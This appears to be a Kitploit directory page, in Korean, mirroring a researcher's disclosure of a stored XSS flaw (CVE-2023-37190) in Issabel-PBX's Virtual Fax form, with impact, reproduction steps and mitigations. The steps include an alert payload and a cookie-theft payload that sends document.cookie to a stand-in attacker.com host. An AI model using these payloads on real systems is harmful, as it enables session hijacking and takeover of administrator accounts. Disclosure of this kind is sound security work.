Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/sahiloj/cve-2023-37190
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPapers & ResearchLearning & Education
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Issabel-PBX 버전 4.0.0-6에 저장형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 이 애플리케이션은 사용자가 제공한 입력을 데이터베이스에 저장하기 전에 적절히 삭제(sanitize)하고 인코딩하지 못하며, 이후 웹 인터페이스에서 이를 렌더링합니다.

저장소 보기
116개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-37190 — Issabel-PBX 4.0.0-6: 저장된 크로스 사이트 스크립팅(XSS)

CVE Severity Type Affected Version


📋 개요

필드세부 정보
CVE IDCVE-2023-37190
취약점저장형 크로스 사이트 스크립팅(XSS)
영향받는 제품Issabel-PBX
영향받는 버전4.0.0-6
심각도중간 (CVSS v3.1 점수: 5.4)
발견자Sahil Ojha
공개 날짜2023년 7월 7일
공급업체Issabel
소스 코드IssabelFoundation/issabelPBX
테스트 환경Windows

📝 설명

Issabel-PBX 버전 4.0.0-6에는 저장형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 이 애플리케이션은 사용자가 입력한 값을 데이터베이스에 저장하기 전에 적절히 삭제(sanitize) 및 인코딩하지 못하며, 이후 웹 인터페이스에서 이를 렌더링할 때도 마찬가지입니다.

이 취약점은 Virtual Fax(가상 팩스) 모듈, 특히 "New Virtual Fax" 생성 양식에 존재합니다. Virtual Fax Name 및 Caller ID Name이라는 두 입력 매개변수는 적절한 입력 검증이나 출력 인코딩을 거치지 않습니다. 이로 인해 낮은 권한의 인증된 공격자가 악성 JavaScript 페이로드를 애플리케이션 내에 주입하여 영구적으로 저장할 수 있습니다.

저장된 악성 스크립트는 해당 페이지를 방문하는 모든 사용자(관리자 포함)의 브라우저에서 공격자의 추가적인 상호작용 없이 자동으로 실행됩니다.


⚠️ 영향

이 취약점을 성공적으로 악용한 공격자는 다음을 수행할 수 있습니다:

  • 세션 쿠키를 탈취하고 관리자 계정을 포함한 인증된 사용자 세션을 가로챌 수 있습니다.
  • 피해자를 대신해 작업을 수행할 수 있습니다. 예: 구성 변경, 사용자 추가, 시스템 설정 수정.
  • 사용자를 공격자가 통제하는 피싱 또는 악성코드 유포 페이지로 리디렉션할 수 있습니다.
  • 애플리케이션 인터페이스를 변조하여 사용자 경험과 신뢰도에 영향을 줄 수 있습니다.
  • 영향을 받는 페이지에 접근하는 모든 사용자에게 악성코드 또는 브라우저 익스플로잇을 전달할 수 있습니다.
  • 키로깅을 수행하거나 페이지에 입력된 민감한 정보를 캡처할 수 있습니다.

페이로드가 저장형(영구적)이기 때문에, 제거되기 전까지 취약한 페이지를 방문하는 모든 사용자에게 영향을 미칩니다. 이로 인해 반사형 XSS보다 더 심각합니다.


🔢 CVSS v3.1 점수


🔍 취약점 세부 정보

  • 취약점 유형: 저장형 크로스 사이트 스크립팅 (CWE-79)
  • 영향받는 구성 요소: Virtual Fax 모듈 → New Virtual Fax 양식
  • 취약한 매개변수:
    • Virtual Fax Name
    • Caller ID Name
  • 인증 필요: 예 (낮은 권한의 인증된 사용자)
  • 근본 원인: 영향을 받는 매개변수가 데이터베이스에 저장되고 웹 UI에서 렌더링되기 전에 입력 삭제 및 출력 인코딩이 누락되었습니다.

🛠️ 재현 단계

사전 요구 사항

  • 실행 중인 Issabel-PBX 버전 4.0.0-6 인스턴스.
  • Fax 모듈에 접근할 수 있는 계정(일반 사용자 또는 관리자)의 유효한 자격 증명.

재현 절차

1단계: 유효한 자격 증명을 사용하여 Issabel-PBX 웹 애플리케이션에 로그인합니다.

2단계: Fax → Virtual Fax → New Virtual Fax로 이동합니다.

다음 XSS 페이로드를 Virtual Fax Name 및/또는 Caller ID Name 필드에 주입합니다:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

세션 쿠키 탈취를 입증하는 더 효과적인 개념 증명 코드는 다음과 같습니다 (실제 공격에서는 탈취된 쿠키가 전송 중 노출되는 것을 방지하기 위해 HTTPS를 사용합니다):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

주입된 페이로드가 포함된 작성 양식은 아래 스크린샷과 유사해야 합니다:

Step 2 - Injecting XSS payload into Virtual Fax Name and Caller ID Name fields

3단계: Save 버튼을 클릭하여 양식을 제출합니다. 이제 페이로드가 애플리케이션 데이터베이스에 영구적으로 저장됩니다.

4단계: Virtual Fax 목록 페이지로 이동합니다 (또는 관리자와 같은 다른 사용자가 해당 페이지를 방문하게 합니다). 저장된 스크립트는 아래와 같이 방문자의 브라우저에서 자동으로 실행됩니다:

Step 4 - Stored XSS payload executing in the browser


🩹 완화 및 수정 방안

Issabel-PBX 사용자와 관리자는 다음 조치를 적용할 것을 강력히 권장합니다:

  1. 입력 검증: 모든 사용자 입력에 대해 엄격한 서버 측 검증을 시행합니다. HTML 특수 문자(<, >, ", ', &)가 포함된 입력은 거부하거나 삭제합니다.
  2. 출력 인코딩: 웹 인터페이스에서 사용자 제공 데이터를 렌더링할 때 컨텍스트를 고려한 출력 인코딩(HTML 엔터티 인코딩)을 적용하여 스크립트 실행을 방지합니다.
  3. 콘텐츠 보안 정책(CSP): 엄격한 Content-Security-Policy HTTP 헤더를 구현하여 스크립트가 실행될 수 있는 소스를 제한함으로써 XSS 취약점의 영향을 줄입니다.
  4. 업그레이드 / 패치: 공식 Issabel 저장소를 모니터링하고 공급업체가 배포한 보안 패치를 적용합니다.
  5. 최소 권한: Virtual Fax와 같은 민감한 모듈에 대한 접근을 필요로 하는 사용자로만 제한하여 공격 표면을 줄입니다.

📚 참고 자료

  • NVD - CVE-2023-37190
  • MITRE CVE Entry
  • Issabel 공식 웹사이트
  • IssabelFoundation/issabelPBX on GitHub
  • CWE-79: 웹 페이지 생성 시 입력 값의 부적절한 중화('크로스 사이트 스크립팅')
  • OWASP: 크로스 사이트 스크립팅(XSS)

👤 작성자

Sahil Ojha
보안 연구원
GitHub: @sahiloj


고지 사항: 이 저장소는 교육 및 책임 있는 공개 목적으로만 제공됩니다. 여기에 제공된 정보는 시스템 소유자의 명시적인 서면 허가 없이 시스템을 공격하는 데 사용되어서는 안 됩니다. 작성자는 이 정보의 오용에 대해 책임을 지지 않습니다.

도구 다운로드
지표값
기본 점수5.4 (중간)
공격 경로네트워크
공격 복잡성낮음
필요 권한낮음
사용자 상호작용필요
범위변경됨
기밀성낮음
무결성낮음
가용성없음